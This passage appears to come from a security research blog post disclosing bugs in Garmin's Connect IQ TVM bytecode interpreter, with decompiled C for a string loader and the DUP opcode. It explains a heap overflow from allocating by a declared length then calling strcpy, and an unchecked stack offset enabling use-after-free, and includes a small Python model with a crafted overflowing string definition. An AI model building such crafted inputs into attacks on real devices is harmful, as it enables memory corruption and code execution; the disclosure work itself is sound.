    rv = tvm_string_def_to_value(ctx, string_def, (unsigned __int8 *)string_value_out, 1);
  return rv;
}

int __fastcall tvm_string_def_to_value(_BYTE *a1, unsigned __int8 *a2, unsigned __int8 *a3, int a4)
{
  _BYTE *v4; // r6
  unsigned __int8 *v5; // r4
  struct tvm_value *v6; // r5
  int result; // r0
  _BYTE *v8; // r4
  int v9; // r6
  __int16 v10; // r0
  int v11; // r3
  int v12; // [sp+4h] [bp-14h]

  v4 = a1;
  v5 = a2;
  v6 = (struct tvm_value *)a3;
  if ( a4 )
  {
    if ( *a2 != 1 )
      return 5;
    v5 = a2 + 1;
  }
  result = tvm_value_string_alloc_by_size((struct tvm *)a1, v5[1] | (*v5 << 8), (int)a3);
  if ( !result )
  {
    result = tvm_value_string_to_ptr(v4, v6, &v12);
    if ( !result )
    {
      v8 = v5 + 2;
      v9 = v12;
      v10 = strlen_utf8(v8);
      v11 = v12;
      *(_WORD *)(v9 + 6) = v10;
      strcpy_(v11 + 8, (unsigned int)v8);
      if ( v6->type == STRING )
        return sub_10DE28(v6);
      return 5;
    }
  }
  return result;
}

The tvm_string_def_to_value function allocates the string using the size found in memory and then proceeds to strcpy the provided data into the freshly allocated buffer.
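
The mismatch is easy to demonstrate with a Python model of the string definition. The layout follows the decompilation (a 0x01 marker, a big-endian 16-bit length, then the bytes); the function name is mine, and the model deliberately ignores the 8-byte string header and whatever slack the allocator may add, so it only compares the declared length with the number of bytes a strcpy would write.

```python
def news_copy_lengths(string_def):
    """Return (declared_length, bytes_written_by_strcpy) for a definition."""
    if string_def[0] != 0x01:
        raise ValueError("bad string definition marker")
    # Matches `v5[1] | (*v5 << 8)`: the length is stored big endian.
    declared = (string_def[1] << 8) | string_def[2]
    body = string_def[3:]
    nul = body.find(b"\x00")
    if nul < 0:
        raise ValueError("no NUL terminator in the sample data")
    # strcpy copies up to and including the terminator.
    return declared, nul + 1


well_formed = b"\x01\x00\x05hello\x00"
malicious = b"\x01\x00\x02" + b"A" * 32 + b"\x00"

print(news_copy_lengths(well_formed))  # (5, 6)
print(news_copy_lengths(malicious))    # (2, 33)
```

A crafted PRG only needs to declare a short length and omit the early NUL to make the copy run well past the buffer sized from that length.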

DUP

The DUP instruction allows the running program to duplicate a value from any slot on the stack and push the copy on the top of the stack.

int __fastcall tvm_op_dup(struct tvm *ctx)
{
  char *pc; // r1
  struct stack_value *sp; // r2
  int stack_offset; // t1
  struct tvm *ctx:v4; // r3
  int v5; // r0
  struct stack_value v7; // [sp+0h] [bp-10h]

  pc = ctx->pc_ptr;
  sp = ctx->stack_ptr;
  stack_offset = (unsigned __int8)*pc;
  ctx->pc_ptr = pc + 1;
  ctx:v4 = ctx;
  v7 = sp[-stack_offset];
  v5 = *(_DWORD *)&v7.type;
  ctx:v4->stack_ptr = sp + 1;
  *(_DWORD *)&sp[1].type = v5;
  HIBYTE(sp[1].value) = HIBYTE(v7.value);
  tvm_value_incref(ctx:v4, (struct tvm_value *)&v7);
  return 0;
}

The implementation reads the next byte from the instruction stream, uses this byte as the negative offset to read from the top of the stack, and then copies that value to the next stack entry. Finally, the function increases the reference count in the tvm_value. The lack of a bounds check allows referencing memory outside of the stack for the tvm_value copy resulting in multiple primitives including use-after-free.

What next?

Well, those are a handful of bugs found via static code analysis. They were also found by accident without a dedicated plan of attack or comprehensive audit of the TVM attack surface. While the TVM appears clean in design and implementation, these bugs suggest the CIQ applications were likely not considered attack surface in the past. Finding more of the lower hanging bugs should be straightforward using a dynamic fuzzing approach. Unfortunately, doing so on an off-the-shelf device is slow and lacks reliability. An interesting next step would be running the firmware, either stock or modified, on a devkit or within a QEMU emulated environment.

We've spent some time working towards a functioning QEMU patch that emulates the MAX32630 and some of the relevant peripherals. We're not yet to the point where the watch comes all the way up but have learned more and more about the firmware in the process. A more direct approach would set up a runtime state that allowed just the PRG loader and TVM interpreter to run. This seems possible but the Garmin RTOS provides a number of services that would need to be stubbed out.

Another interesting task would be to finish a full code execution exploit for these bugs and to pivot towards exploitation of one of the attached microcontrollers (the Bluetooth controller, for instance).

Edit (11-18-2020): Clarified which firmware was current during analysis and added a link to the updated (patched) firmware.


This blog post was written by Dion Blazakis, technical peer review by Zach Lanier, and edited for the web by Lacey Kasten at Atredis Partners.